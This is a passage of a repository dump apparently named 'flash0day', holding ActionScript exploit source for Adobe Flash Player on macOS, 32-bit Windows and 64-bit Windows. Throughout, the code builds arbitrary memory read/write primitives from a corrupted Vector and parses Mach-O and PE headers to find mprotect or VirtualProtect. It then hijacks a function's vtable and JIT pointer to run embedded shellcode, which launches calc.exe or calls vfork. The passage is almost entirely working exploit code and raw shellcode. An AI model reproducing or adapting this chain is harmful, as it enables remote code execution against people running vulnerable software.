SetBase(addr:Number) 154 | { 155 | if (addr < _base || addr >= _baseMax) { 156 | Set64(4, addr); // _v[4],[5] 157 | _base = addr; 158 | _baseMax = addr + 0xfffffff0; 159 | } 160 | } 161 | 162 | // reads uint from the memory address 163 | static function Get32(addr:Number):uint 164 | { 165 | if (addr < 0x10000) throw new Error("Get32() at addr = " + Hex(addr)); // bad pointer 166 | 167 | SetBase(addr); 168 | _mc.position = uint((addr - _base) & (N32-1)); 169 | return _mc.readUnsignedInt(); 170 | } 171 | 172 | // writes uint into the memory address 173 | static function Set32(addr:Number, u:uint) 174 | { 175 | if (addr < 0x10000) throw new Error("Set32() to addr = " + 
Hex(addr)); // bad pointer 176 | 177 | SetBase(addr); 178 | _mc.position = uint((addr - _base) & (N32-1)); 179 | _mc.writeUnsignedInt(u); 180 | } 181 | 182 | // reads uint64 from the memory address 183 | static function Get(addr:Number):Number 184 | { 185 | if (addr < 0x10000) throw new Error("Get() at addr = " + Hex(addr)); // bad pointer 186 | 187 | SetBase(addr); 188 | _mc.position = uint((addr - _base) & (N32-1)); 189 | var lo:uint = _mc.readUnsignedInt(); 190 | var hi:uint = _mc.readUnsignedInt(); 191 | return Num(lo,hi); 192 | } 193 | 194 | // writes uint64 into the memory address 195 | static function Set(addr:Number, n:Number) 196 | { 197 | if (addr < 0x10000) throw new Error("Set() to addr = " + Hex(addr)); // bad pointer 198 | 199 | SetBase(addr); 200 | _mc.position = uint((addr - _base) & (N32-1)); 201 | _mc.writeUnsignedInt(Low(n)); 202 | _mc.writeUnsignedInt(Hi(n)); 203 | } 204 | 205 | // returns object's address 206 | static function GetAddr(obj:Object):Number 207 | { 208 | _mc.o1 = obj; 209 | return Get64(_mcOffs) - 1; // atom decrement 210 | } 211 | 212 | // get memory dump // for RnD 213 | static function Dump(addr:Number, len:uint):String 214 | { 215 | var str:String = ""; 216 | for(var i:uint; i < len; i++, addr+=8) { 217 | str += Get(addr).toString(16) + ","; 218 | if (i % 8 == 7) str += "
"; 219 | } 220 | return str; 221 | } 222 | 223 | // searches for the mprotect() address 224 | static function FindMP():Number 225 | { 226 | try 227 | { 228 | // find Mach64 header 229 | var b:Number = Get64(_mcOffs-4, 0xfffff000) - (Capabilities.playerType == "StandAlone" ? 0x1300000 : 0x1900000); 230 | //logAdd("b = " + Hex(b)); 231 | for(var i:uint; i < 0x100; i++, b -= 0x1000){ 232 | // check 'FEEDFACF' 233 | if (Get32(b) == 0xfeedfacf) { logAdd("module base = " + Hex(b)); break; } 234 | } 235 | if (i >= 0x100) throw new Error("can't find FEEDFACF at " + Hex(b)); 236 | 237 | // get number of load commands 238 | var lcn:uint = Get32(b + 0x10); 239 | var stub:Number = 0, sym:Number = 0, isym:Number = 0, str:Number = 0, s:Number, link:Number = 0, offs:Number = 0, 240 | symCnt:uint, strCnt:uint, stubCnt:uint, stubIdx:uint, stubSize:uint, f:uint; 241 | 242 | // find LC_SEGMENT_64, LC_SYMTAB and LC_DYSYMTAB segments 243 | for(var lc:Number = b + 0x20; lcn > 0; lcn--) { 244 | f = Get32(lc); 245 | // check for LC_SEGMENT_64 246 | if (stub == 0 && f == 0x19) { 247 | // get number of sections 248 | var sn:uint = Get32(lc + 0x40); 249 | for(s = lc + 0x48; sn > 0; sn--, s+=0x50) { 250 | f = Get32(s + 0x40); 251 | // check S_SYMBOL_STUBS and S_ATTR_PURE_INSTRUCTIONS section flags 252 | if ((f & 0xff) == 8 && (f & 0x80000000) != 0) { 253 | stub = Get(s + 0x20); 254 | if (stub < b || stub <= Get32(s + 0x30)) stub += b; 255 | stubIdx = Get32(s + 0x44); 256 | stubSize = Get32(s + 0x48); 257 | if (stubSize == 6) stubCnt = Get32(s + 0x28) / stubSize; 258 | break; 259 | } 260 | } 261 | } 262 | // get _LINKEDIT offset 263 | else if (f == 0x19 && Get32(lc + 0xa) == 0x4b4e494c) { 264 | link = Get(lc + 0x28) 265 | offs = Get(lc + 0x18); 266 | if (offs > b) offs -= b; 267 | offs -= link; 268 | } 269 | // check for LC_SYMTAB 270 | else if (sym == 0 && f == 2) { 271 | sym = b + Get32(lc + 8); 272 | symCnt = Get32(lc + 12); 273 | str = b + Get32(lc + 16); 274 | strCnt = Get32(lc + 20); 275 
| } 276 | // check for LC_DYSYMTAB 277 | else if (isym == 0 && f == 11) { 278 | isym = b + Get32(lc + 0x38); 279 | } 280 | 281 | if (stub != 0 && sym != 0 && isym != 0) break; 282 | 283 | // move to the next LC 284 | lc += Get32(lc + 4); 285 | } 286 | 287 | // check results 288 | if (stub <= b || stubCnt == 0 || sym <= b || str <= b || isym <= b) 289 | throw new Error("stub = " + Hex(stub) + ", stubCnt = " + stubCnt + ", stubSize = " + stubSize 290 | + ", isym = " + Hex(isym) + ", sym = " + Hex(sym) + ", str = " + Hex(str)); 291 | 292 | // add _LINKEDIT segment offset 293 | if (offs > 0) { 294 | link += b; 295 | if (sym >= link) sym += offs; 296 | if (isym >= link) isym += offs; 297 | if (str >= link) str += offs; 298 | } 299 | 300 | //logAdd("stub = " + Hex(stub) + ", stubCnt = " + stubCnt + ", stubSize = " + stubSize + ", isym = " + Hex(isym) 301 | //+ ", sym = " + Hex(sym) + ", str = " + Hex(str) + ", link = " + Hex(link) + ", offs = " + Hex(offs)); 302 | 303 | // find '_mprotect' symbol 304 | for(i=0; i < stubCnt; i++, isym+=4) { 305 | // get symbol index 306 | f = Get32(isym); 307 | if (f == 0 || f > symCnt) throw new Error("isym = " + Hex(isym) + " -> " + Hex(f)); 308 | 309 | // get string index 310 | f = Get32(sym + f*16); 311 | if (f == 0 || f > strCnt) throw new Error("sym = " + Hex(sym) + " -> " + Hex(f)); 312 | 313 | // compare string with '_mpr' and 'ect'0 314 | if (Get32(str + f) == 0x72706d5f && Get32(str + f+6) == 0x746365) { 315 | // check stub pointer 316 | stub += i*stubSize; 317 | f = Get32(stub); 318 | if ((f & 0xffff) == 0x25ff) return stub; // ok 319 | 320 | logAdd('_mprotect stub = ' + Hex(stub) + " -> " + Hex(f)); 321 | break; 322 | } 323 | } 324 | 325 | if (i >= stubCnt) throw new Error("can't find '_mprotect' stub"); 326 | } 327 | catch (e:Error) 328 | { 329 | logAdd("FindMP() " + e.toString()); 330 | } 331 | 332 | return 0; 333 | } 334 | 335 | // declare dummy victim function 336 | static function Payload(...a){} 337 | 338 | // corrupts 
Payload function and calls mprotect() 339 | static function CallMP(mp:Number):Number 340 | { 341 | // generate Payload() function object 342 | Payload(); 343 | Payload.call(null); 344 | 345 | // find vtable pointer in Payload() 346 | var p:Number = GetAddr(Payload); 347 | var ptbl:Number = Get(Get(Get(p + 0x10) + 0x28) + 8) + (_isDbg ? 0x120:0x108); 348 | // save old pointers 349 | var p1:Number = Get(ptbl); 350 | var p2:Number = Get(p+0x38); 351 | var p3:Number = Get(p+0x40); 352 | var p4:Number = Get(p1-8); 353 | //logAdd(Dump(p,16) + "
" + Hex(p1) + ", " + Hex(p2) + ", " + Hex(p3)); 354 | 355 | // allocate storage for payload and get his address 356 | var len:uint = _x64.length; 357 | var v:Vector. = new Vector.(Math.max(0x700, len + 0x400)); 358 | var vAddr:Number = GetAddr(v); 359 | logAdd("x64[] object = " + Hex(vAddr)); 360 | vAddr += _isDbg ? 0x38 : 0x30; 361 | if (Get(vAddr) < 0x10000) vAddr -= 8; // for FP 11.4 362 | vAddr = Get(vAddr) + 0x10; 363 | var u:uint = (0x1000 - (vAddr & 0xfff)) >>> 2; 364 | vAddr += u*4; // for page alignment 365 | logAdd("x64[] data = " + Hex(vAddr)); 366 | _gc.push(v); 367 | 368 | // create copy of vtable 369 | var j:uint = u; 370 | for(var i:uint; i < 0x100; i++, j++) v[j] = Get32(p1 + i*4); 371 | var p11:Number = Get(p1)-0x100; 372 | for(i=0; i < 0x200; i++, j++) v[j] = Get32(p11 + i*4); 373 | // set new vtable pointer 374 | v[u-2] = Low(p4); 375 | v[u-1] = Hi(p4); 376 | v[u+0] = Low(vAddr + 0x140*4); 377 | v[u+1] = Hi(vAddr + 0x140*4); 378 | // redirect one method pointer to mprotect() 379 | v[u+0x140 + 16] = Low(mp); 380 | v[u+0x140 + 17] = Hi(mp); 381 | 382 | // set second arg for mprotect() 383 | Set(p+0x38, 0x1000 * ((len >>> 12) + 1)); 384 | // set third arg = 7 = PROT_READ + PROT_WRITE + PROT_EXEC 385 | Set(p+0x40, 7); 386 | 387 | // replace vtable pointer in Payload() and set first arg for mprotect() 388 | Set(ptbl, vAddr); 389 | 390 | // call mprotect(vAddr, size, 7) 391 | Payload.call(null); 392 | 393 | // restore old pointers 394 | Set(ptbl, p1); 395 | Set(p+0x38, p2); 396 | Set(p+0x40, p3); 397 | 398 | // copy _x64[] into v[] 399 | for(i=0; i < len; i++, u++) v[u] = _x64[i]; 400 | 401 | // return pointer to payload 402 | return vAddr; 403 | } 404 | 405 | 406 | // 407 | static function Exec() 408 | { 409 | try 410 | { 411 | // find mprotect() address 412 | var mpAddr:Number = FindMP(); 413 | logAdd("mprotect() address = " + Hex(mpAddr)); 414 | 415 | // call mprotect() 416 | var xAddr:Number = CallMP(mpAddr); 417 | 418 | // find Payload JIT code 
pointer 419 | var payAddr:Number = GetAddr(Payload); 420 | logAdd("Payload() object = " + Hex(payAddr)); 421 | payAddr = Get(Get(payAddr + 0x38) + 0x10) + 8; 422 | var old:Number = Get(payAddr); 423 | //logAdd("Payload() address = " + Hex(old)); 424 | 425 | // replace JIT pointer by payload pointer 426 | Set(payAddr, xAddr); 427 | 428 | // call x64 payload 429 | var res = Payload.call(null); 430 | logAdd("Payload(): vfork() returns " + res + (res == 1 ? " (in sandbox)":" (pid)")); 431 | 432 | // restore old pointer 433 | Set(payAddr, old); 434 | } 435 | catch (e:Error) 436 | { 437 | logAdd("Exec() " + e.toString()); 438 | } 439 | 440 | CleanUp(); 441 | } 442 | 443 | } 444 | 445 | } -------------------------------------------------------------------------------- /flash0day/exp1/ShellWin32.as: -------------------------------------------------------------------------------- 1 | package 2 | { 3 | import flash.utils.ByteArray; 4 | 5 | class ShellWin32 extends MyClass 6 | { 7 | static var 8 | _v:Vector., // uint vector with corrupted length >= 0x40000000 9 | _vAddr:uint, // _v[0] address 10 | _mc:MyClass2, 11 | _mcOffs:uint, // index of mc.o1 within _v[] 12 | 13 | // x32 shellcode // searches and calls CreateProcessA("calc.exe",...) and returns eax as uint atom 14 | _x32:Vector. 
= Vector.([ 15 | 0x83EC8B55, 0x5153ACC4, 0x058B6457, 0x00000030, 0x8B0C408B, 0x008B0C40, 0x588B008B, 0x03D88918, 16 | 0x508B3C40, 0x8BDA0178, 0xDF01207A, 0x078BC931, 0x3881D801, 0x61657243, 0x78811C75, 0x4173730B, 17 | 0x8B137500, 0xD8012442, 0x4804B70F, 0x011C528B, 0x821C03DA, 0xC78309EB, 0x4A3B4104, 0x8DCF7C18, 18 | 0x8D50F045, 0x3157AC7D, 0x0011B9C0, 0xABF30000, 0x44AC45C7, 0x50000000, 0x50505050, 0x0009E850, 19 | 0x61630000, 0x652E636C, 0x50006578, 0x595FD3FF, 0x03E0C15B, 0xC906C083, 0x909090C3 20 | ]); 21 | 22 | // converts uint to hex string 23 | static function Hex(u:uint):String 24 | { 25 | if (u <= 9 ) return u.toString() 26 | else return "0x" + u.toString(16); 27 | } 28 | 29 | // init global vars 30 | static function Init(v:Vector., vAddr:uint, mc:MyClass2, mcOffs:uint):Boolean 31 | { 32 | _v = v; _vAddr = vAddr; _mc = mc; _mcOffs = mcOffs; 33 | 34 | logAdd("v[0] address = " + Hex(_vAddr)); 35 | return Get(vAddr - 8) == v.length; 36 | } 37 | 38 | // restores corrupted memory 39 | static function CleanUp() 40 | { 41 | // restore _v.length 42 | Set(_vAddr - 0x8, 0x3f0); 43 | } 44 | 45 | // reads uint from the custom memory address 46 | static function Get(addr:uint):uint 47 | { 48 | if (addr < 0x10000) throw new Error("Get() at addr = " + Hex(addr)); // bad pointer 49 | return _v[(addr - _vAddr) >>> 2]; 50 | } 51 | 52 | // writes uint into the custom memory address 53 | static function Set(addr:uint, val:uint) 54 | { 55 | if (addr < 0x10000) throw new Error("Set() to addr = " + Hex(addr)); // bad pointer 56 | _v[(addr - _vAddr) >>> 2] = val; 57 | } 58 | 59 | // returns object's address 60 | static function GetAddr(obj:Object):uint 61 | { 62 | _mc.o1 = obj; 63 | return _v[_mcOffs] - 1; // atom decrement 64 | } 65 | 66 | // searches for the kernel32.VirtualProtect() address 67 | static function FindVP():uint 68 | { 69 | try 70 | { 71 | // find IMAGE_DOS_HEADER 72 | var u:uint, b:uint = _v[_mcOffs-3]; // b = vtable pointer inside dll/exe 73 | b = uint(b & 
0xffff0000) - 0x400000 - _vAddr; 74 | for(var i:uint; i < 0x90; i++, b -= 0x10000){ 75 | // check 'MZ' 76 | u = b >>> 2; 77 | if (uint(_v[u] & 0xffff) == 0x5a4d) break; 78 | } 79 | if (i >= 0x90) throw new Error("can't find MZ from " + Hex(_v[_mcOffs-3])); 80 | 81 | // get IMAGE_NT_HEADERS 82 | u += 15; 83 | u = (b + _v[u]) >>> 2; 84 | // check 'PE' 85 | if (_v[u] != 0x4550) throw new Error("can't find PE"); 86 | 87 | // get IMAGE_IMPORT_DIRECTORY 88 | u += 33; 89 | var size:uint = _v[u] >>> 2 90 | u = uint(b + _v[--u]) >>> 2; 91 | 92 | // find kernel32.dll 93 | var v:Vector. = new Vector.(4); 94 | var oft:uint, ft:uint, j:uint, k:uint; 95 | u += 3; 96 | for(i=3; i < size; i += 5, u += 5){ 97 | // read dll name into vector 98 | j = (b + _v[u]) >>> 2; 99 | for(k=0; k < 4; k++, j++) v[k] = _v[j]; 100 | 101 | // check dll name 102 | if (MyUtils.IsEqual(v, "KERNEL32.DLL")) { 103 | oft = _v[u-3]; ft = _v[u+1]; 104 | break; 105 | } 106 | } 107 | 108 | if (oft == 0 || ft == 0) throw new Error("can't find kernel32"); 109 | 110 | // find VirtualProtect() address 111 | u = uint(b + oft) >>> 2; 112 | v.length = 5; 113 | 114 | for(i=0; i < 256; i++, u++){ 115 | // get proc name 116 | j = _v[u]; 117 | if (j == 0) throw new Error("can't find VirtualProtect"); 118 | j = (b + j) >>> 2; 119 | for(k=0; k < 5; k++, j++) v[k] = _v[j]; 120 | 121 | // check proc name 122 | if (MyUtils.IsEqual(v, "VIRTUALPROTECT", 2) && (MyUtils._bArr.readByte() == 0)) { 123 | j = uint(b + ft + i*4) >>> 2; 124 | return _v[j]; 125 | } 126 | } 127 | } 128 | catch (e:Error) 129 | { 130 | logAdd("FindVP() " + e.toString()); 131 | } 132 | 133 | return 0; 134 | } 135 | 136 | // declare dummy victim function 137 | static function Payload(...a){} 138 | 139 | // corrupts Payload function and calls VirtualProtect() 140 | static function CallVP(vp:uint, xAddr:uint, xLen:uint) 141 | { 142 | // generate Payload function object 143 | Payload(); 144 | 145 | // find vtable pointer in Payload() 146 | var p:uint = 
GetAddr(Payload); 147 | var ptbl:uint = Get(Get(Get(Get(p + 8) + 0x14) + 4) + (_isDbg ? 0xbc:0xb0)); 148 | // save old pointers 149 | var p1:uint = Get(ptbl); 150 | var p2:uint = Get(p+0x1c); 151 | var p3:uint = Get(p+0x20); 152 | 153 | // create copy of vtable 154 | for(var i:uint; i < 0x100; i++) _v[i] = Get(p1-0x80 + i*4); 155 | // redirect one pointer to VirtualProtect() 156 | _v[0x20+7] = vp; 157 | 158 | // set first arg for VirtualProtect() 159 | Set(p+0x1c, xAddr); 160 | // set second arg 161 | Set(p+0x20, xLen); 162 | // set third arg = 0x40 PAGE_EXECUTE_READWRITE 163 | var args:Array = new Array(0x41); 164 | 165 | // replace vtable pointer in Payload() 166 | Set(ptbl, _vAddr + 0x80); 167 | 168 | // call VirtualProtect() 169 | var res = Payload.call.apply(null, args); 170 | 171 | // restore old pointers 172 | Set(ptbl, p1); 173 | Set(p+0x1c, p2); 174 | Set(p+0x20, p3); 175 | 176 | // res should be nonzero (eax != 0) 177 | //if (("" + res) == "undefined") throw new Error("VirtualProtect() result = 0") 178 | //else logAdd("VirtualProtect() result = " + res); 179 | } 180 | 181 | // 182 | static function Exec() 183 | { 184 | try 185 | { 186 | // get _x32[0] address 187 | var xAddr:uint = GetAddr(_x32); 188 | logAdd("x32[] object = " + Hex(xAddr)); 189 | xAddr += _isDbg ? 
0x1c : 0x18; 190 | if (Get(xAddr) < 0x10000) xAddr -= 4; // for FP 11.4 191 | xAddr = Get(xAddr) + 8; 192 | logAdd("x32[] data = " + Hex(xAddr)); 193 | 194 | // get kernel32.VirtualProtect() address 195 | var vpAddr:uint = FindVP(); 196 | logAdd("VirtualProtect() address = " + Hex(vpAddr)); 197 | if (vpAddr == 0) throw new Error("vpAddr == 0"); 198 | 199 | // call VirtualProtect() 200 | CallVP(vpAddr, xAddr, _x32.length*4); 201 | 202 | // find Payload JIT code pointer 203 | var payAddr:uint = GetAddr(Payload); 204 | logAdd("Payload() object = " + Hex(payAddr)); 205 | payAddr = Get(Get(payAddr + 0x1c) + 8) + 4; 206 | var old:uint = Get(payAddr); 207 | 208 | // replace JIT pointer by &_x32[0] 209 | Set(payAddr, xAddr); 210 | 211 | // call x32 payload 212 | var res = Payload.call(null); 213 | logAdd("CreateProcessA() returns " + res + (res == 0 ? " (in sandbox)":"")); 214 | 215 | // restore old pointer 216 | Set(payAddr, old); 217 | } 218 | catch (e:Error) 219 | { 220 | logAdd("Exec() " + e.toString()); 221 | } 222 | 223 | CleanUp(); 224 | } 225 | 226 | } 227 | 228 | } -------------------------------------------------------------------------------- /flash0day/exp1/ShellWin64.as: -------------------------------------------------------------------------------- 1 | package 2 | { 3 | import flash.utils.ByteArray; 4 | import flash.utils.Endian; 5 | 6 | class ShellWin64 extends MyClass 7 | { 8 | static var 9 | _v:Vector., // uint vector with corrupted length 10 | _vAddr:Number, // _v[0] address 11 | _base:Number, 12 | _baseMax:Number, 13 | _baseOld:Number, 14 | _mc:MyClass2, // descendant of ByteArray allocated right after _v[] 15 | _mcOffs:uint, // index of mc.o1 within _v[] 16 | N32:Number = Math.pow(2,32), 17 | 18 | // x64 shellcode 19 | _x64:Vector. = Vector.([ 20 | // searches and calls CreateProcessA("calc.exe",...) 
and returns rax as uint atom 21 | 0xC4834855, 0xEC8B4880, 0x65575153, 0x25048B48, 0x00000060, 0x18408B48, 0x10408B48, 0x48008B48, 22 | 0x8B48008B, 0x438B3058, 0xD801483C, 0x0088908B, 0x01480000, 0x207A8BDA, 0x48DF0148, 0x078BC931, 23 | 0x81D80148, 0x65724338, 0x81217561, 0x73730B78, 0x18750041, 0x4824428B, 0xB70FD801, 0x7A8B4804, 24 | 0xDF01481C, 0x48873C8B, 0x0CEBFB01, 0x04C78348, 0x3BC1FF48, 0xC67C184A, 0x48E08948, 0x0008E081, 25 | 0x29480000, 0x485050C4, 0x5000458D, 0x187D8D48, 0xC0314857, 0x00000DB9, 0xAB48F300, 0x681845C7, 26 | 0xE8000000, 0x00000009, 0x636C6163, 0x6578652E, 0x31485A00, 0x515151C9, 0xC9894951, 0x48C88949, 27 | 0x4820EC83, 0x8348D3FF, 0xC14850C4, 0x834803E0, 0x595906C0, 0x5FCC0148, 0x8D485B59, 0x000080A5, 28 | 0x90C35D00 29 | 30 | /*/ "empty" payload // returns 12345678 31 | 0x90909090, 32 | 0x614EB848, 0x000000BC, // mov rax, 0xBC614E; 33 | 0xC1480000, 0x834803E0, // shl rax,3; add rax,6; // rax as int atom 34 | 0x90C306C0 // ret*/ 35 | ]); 36 | 37 | // converts two uints to hex string 38 | static function Hex(n:Number):String 39 | { 40 | if (n >= 0 && n <= 9) return n.toString() 41 | else return "0x" + n.toString(16); 42 | } 43 | 44 | // init global vars 45 | static function Init(v:Vector., offs:uint, mc:MyClass2, mcOffs:uint):Boolean 46 | { 47 | _v = v; _mc = mc; _mcOffs = mcOffs; 48 | 49 | _vAddr = Get64(mcOffs, 0xfffff000) - offs + 0x10; 50 | _baseOld = Get64(mcOffs-10); 51 | logAdd("v[0] address = " + Hex(_vAddr)); 52 | logAdd("mc old base = " + Hex(_baseOld)); 53 | 54 | // prepare new base for mc 55 | v[6] = 0xffffffff; // ByteArray::capacity 56 | v[7] = 0xfffffffe; // ByteArray::length 57 | mc.endian = Endian.LITTLE_ENDIAN; 58 | 59 | // set new base 60 | Set64(mcOffs-10, _vAddr); 61 | _base = 0; 62 | _baseMax = 0xfffffff0; 63 | 64 | // check results 65 | var len:uint = mc.length; 66 | logAdd("mc.length = " + Hex(len)); 67 | return len == v[7]; 68 | } 69 | 70 | // restores corrupted memory 71 | static function CleanUp() 72 | { 73 | // 
restore _v.length 74 | Set32(_vAddr - 0x10, 0x3f0); 75 | 76 | _v[6] = 0; // _mc.capacity 77 | _v[7] = 0; // _mc.length 78 | } 79 | 80 | // join two uints as uint64 81 | static function Num(low:uint, hi:uint):Number 82 | { 83 | var n:Number = hi; 84 | if (n != 0) n *= N32; 85 | n += low; 86 | return n; 87 | } 88 | 89 | // get high uint from uint64 90 | static function Hi(n:Number):uint 91 | { 92 | return uint(Math.floor(n / N32) & (N32-1)); 93 | } 94 | 95 | // get low uint from uint64 96 | static function Low(n:Number):uint 97 | { 98 | return uint(n & (N32-1)); 99 | } 100 | 101 | // reads uint64 from _v[] 102 | static function Get64(offs:uint, mask:uint = 0xffffffff):Number 103 | { 104 | return Num(_v[offs] & mask, _v[offs+1]); 105 | } 106 | 107 | // writes uint64 into _v[] 108 | static function Set64(offs:uint, n:Number) 109 | { 110 | _v[offs] = Low(n); 111 | _v[offs+1] = Hi(n); 112 | } 113 | 114 | // sets new address pointer for _mc[0] 115 | static function SetBase(addr:Number) 116 | { 117 | if (addr < _base || addr >= _baseMax) { 118 | Set64(4, addr); // _v[4],[5] 119 | _base = addr; 120 | _baseMax = addr + 0xfffffff0; 121 | } 122 | } 123 | 124 | // reads uint from the memory address 125 | static function Get32(addr:Number):uint 126 | { 127 | if (addr < 0x10000) throw new Error("Get32() at addr = " + Hex(addr)); // bad pointer 128 | 129 | SetBase(addr); 130 | _mc.position = uint((addr - _base) & (N32-1)); 131 | return _mc.readUnsignedInt(); 132 | } 133 | 134 | // writes uint into the memory address 135 | static function Set32(addr:Number, u:uint) 136 | { 137 | if (addr < 0x10000) throw new Error("Set32() to addr = " + Hex(addr)); // bad pointer 138 | 139 | SetBase(addr); 140 | _mc.position = uint((addr - _base) & (N32-1)); 141 | _mc.writeUnsignedInt(u); 142 | } 143 | 144 | // reads uint64 from the memory address 145 | static function Get(addr:Number):Number 146 | { 147 | if (addr < 0x10000) throw new Error("Get() at addr = " + Hex(addr)); // bad pointer 148 | 149 
| SetBase(addr); 150 | _mc.position = uint((addr - _base) & (N32-1)); 151 | var lo:uint = _mc.readUnsignedInt(); 152 | var hi:uint = _mc.readUnsignedInt(); 153 | return Num(lo,hi); 154 | } 155 | 156 | // writes uint64 into the memory address 157 | static function Set(addr:Number, n:Number) 158 | { 159 | if (addr < 0x10000) throw new Error("Set() to addr = " + Hex(addr)); // bad pointer 160 | 161 | SetBase(addr); 162 | _mc.position = uint((addr - _base) & (N32-1)); 163 | _mc.writeUnsignedInt(Low(n)); 164 | _mc.writeUnsignedInt(Hi(n)); 165 | } 166 | 167 | // returns object's address 168 | static function GetAddr(obj:Object):Number 169 | { 170 | _mc.o1 = obj; 171 | return Get64(_mcOffs) - 1; // atom decrement 172 | } 173 | 174 | // get memory dump // for RnD 175 | static function Dump(addr:Number, len:uint):String 176 | { 177 | var str:String = ""; 178 | for(var i:uint; i < len; i++, addr+=8) { 179 | str += Get(addr).toString(16) + ","; 180 | if (i % 8 == 7) str += "
"; 181 | } 182 | return str; 183 | } 184 | 185 | // searches for the kernel32.VirtualProtect() address 186 | static function FindVP():Number 187 | { 188 | try 189 | { 190 | // find IMAGE_DOS_HEADER 191 | var b:Number = Get64(_mcOffs-4, 0xffff0000) - 0x800000; 192 | for(var i:uint; i < 0xf0; i++, b -= 0x10000){ 193 | // check 'MZ' 194 | if (uint(Get32(b) & 0xffff) == 0x5a4d) { /*logAdd("mz offset = " + i);*/ break; } 195 | } 196 | if (i >= 0xf0) throw new Error("can't find MZ at " + Hex(b)); 197 | 198 | // get IMAGE_NT_HEADERS 199 | var n:Number = b + Get32(b + 0x3c); 200 | // check 'PE' 201 | if (Get32(n) != 0x4550) throw new Error("can't find PE at " + Hex(n)); 202 | 203 | // get IMAGE_IMPORT_DIRECTORY 204 | var size:uint = Get32(n + 0x94); 205 | n = b + Get32(n + 0x90); 206 | 207 | // find kernel32.dll 208 | var v:Vector. = new Vector.(4); 209 | var oft:Number, ft:Number, str:Number, k:uint; 210 | 211 | for(i=0; i < size; i += 5*4){ 212 | // read dll name into vector 213 | str = b + Get32(n + i + 3*4); 214 | for(k=0; k < 4; k++, str+=4) v[k] = Get32(str); 215 | 216 | // check dll name 217 | if (MyUtils.IsEqual(v, "KERNEL32.DLL")) { 218 | oft = Get32(n + i); 219 | ft = Get32(n + i + 4*4); 220 | break; 221 | } 222 | } 223 | 224 | if (oft == 0 || ft == 0) throw new Error("can't find kernel32"); 225 | 226 | // find VirtualProtect() address 227 | v.length = 5; oft += b; 228 | for(i=0; i < 0x180; i++, oft+=8){ 229 | // get proc name 230 | str = Get(oft); 231 | if (str == 0) throw new Error("can't find VirtualProtect"); 232 | str += b; 233 | for(k=0; k < 5; k++, str+=4) v[k] = Get32(str); 234 | 235 | // check proc name 236 | if (MyUtils.IsEqual(v, "VIRTUALPROTECT", 2) && (MyUtils._bArr.readByte() == 0)) 237 | return Get(b + ft + i*8); 238 | } 239 | } 240 | catch (e:Error) 241 | { 242 | logAdd("FindVP() " + e.toString()); 243 | } 244 | 245 | return 0; 246 | } 247 | 248 | // declare dummy victim function 249 | static function Payload(...a){} 250 | 251 | // corrupts 
Payload function and calls VirtualProtect() 252 | static function CallVP(vp:Number):Number 253 | { 254 | // generate Payload() function object 255 | Payload(); 256 | var args:Array = new Array(4); 257 | Payload.apply(null, args); 258 | 259 | // find vtable pointer in Payload() object 260 | var p:Number = GetAddr(Payload); 261 | var ptbl:Number = Get(Get(Get(p + 0x10) + 0x28) + 8) + (_isDbg ? 0x120:0x108); // see Function.apply() in IDA64 for offset values 262 | // save original pointers 263 | var p1:Number = Get(ptbl); 264 | var p2:Number = Get(p+0x38); 265 | var p3:Number = Get(p+0x40); 266 | var p4:Number = Get(p1-8); 267 | //logAdd(Hex(p) + ": " + Dump(p,16) + "
" + Hex(p1) + ", " + Hex(p2) + ", " + Hex(p3)); 268 | 269 | // allocate storage for payload and get his address 270 | var len:uint = _x64.length; 271 | var v:Vector. = new Vector.(Math.max(0x300, len)); 272 | var vAddr:Number = GetAddr(v); 273 | logAdd("x64[] object = " + Hex(vAddr)); 274 | vAddr += _isDbg ? 0x38 : 0x30; 275 | if (Get(vAddr) < 0x10000) vAddr -= 8; // for FP 11.4 276 | vAddr = Get(vAddr) + 0x10; 277 | logAdd("x64[] data = " + Hex(vAddr)); 278 | _gc.push(v); 279 | 280 | // create copy of vtable 281 | for(var i:uint; i < 0x100-2; i++) v[i+2] = Get32(p1 + i*4); 282 | var p11:Number = Get(p1) - 0x40*4; 283 | for(i=0; i < 0x200; i++) v[i+0x100] = Get32(p11 + i*4); 284 | // set new vtable pointer 285 | v[0] = Low(p4); 286 | v[1] = Hi(p4); 287 | v[2] = Low(vAddr + 0x140*4); 288 | v[3] = Hi (vAddr + 0x140*4); 289 | // redirect one method pointer to VirtualProtect() // see Function.apply() in IDA64 290 | v[0x140 + 12] = Low(vp); 291 | v[0x140 + 13] = Hi(vp); 292 | 293 | // set second arg for VirtualProtect() 294 | Set(p+0x38, v.length*4); 295 | // set third arg = 0x40 PAGE_EXECUTE_READWRITE 296 | Set(p+0x40, 0x40); 297 | // set fourth arg 298 | var pa:Number = GetAddr(args); 299 | p4 = Get(pa); // save old val 300 | 301 | // replace vtable pointer in Payload() and set first arg for VirtualProtect() 302 | Set(ptbl, vAddr+8); 303 | 304 | // call VirtualProtect() 305 | Payload.apply(null, args); 306 | 307 | // restore old pointers 308 | Set(ptbl, p1); 309 | Set(p+0x38, p2); 310 | Set(p+0x40, p3); 311 | 312 | // check results 313 | logAdd("VirtualProtect() result = " + Hex(Get32(pa))); 314 | p3 = Get(pa); 315 | Set(pa, p4); 316 | if (p4 == p3) throw new Error("VirtualProtect() error"); 317 | 318 | // copy _x64[] into v[] 319 | for(i=0; i < len; i++) v[i] = _x64[i]; 320 | 321 | // return pointer to payload 322 | return vAddr; 323 | } 324 | 325 | // 326 | static function Exec() 327 | { 328 | try 329 | { 330 | // get kernel32.VirtualProtect() address 331 | var 
vpAddr:Number = FindVP(); 332 | logAdd("VirtualProtect() address = " + Hex(vpAddr)); 333 | if (vpAddr == 0) throw new Error("vpAddr == 0"); 334 | 335 | // call VirtualProtect() 336 | var xAddr:Number = CallVP(vpAddr); 337 | 338 | // find Payload JIT code pointer 339 | var payAddr:Number = GetAddr(Payload); 340 | logAdd("Payload() object = " + Hex(payAddr)); 341 | payAddr = Get(Get(payAddr + 0x38) + 0x10) + 8; 342 | var old:Number = Get(payAddr); 343 | //logAdd("Payload() address = " + Hex(payAddr)); 344 | 345 | // replace JIT pointer by payload pointer 346 | Set(payAddr, xAddr); 347 | 348 | // call x64 payload 349 | var res = Payload.call(null); 350 | logAdd("CreateProcessA() returns " + res + (res == 0 ? " (in sandbox)":"")); 351 | 352 | // restore old pointer 353 | Set(payAddr, old); 354 | } 355 | catch (e:Error) 356 | { 357 | logAdd("Exec() " + e.toString()); 358 | } 359 | 360 | CleanUp(); 361 | } 362 | 363 | } 364 | 365 | } -------------------------------------------------------------------------------- /flash0day/exp1/exp1.fla: -------------------------------------------------------------------------------- 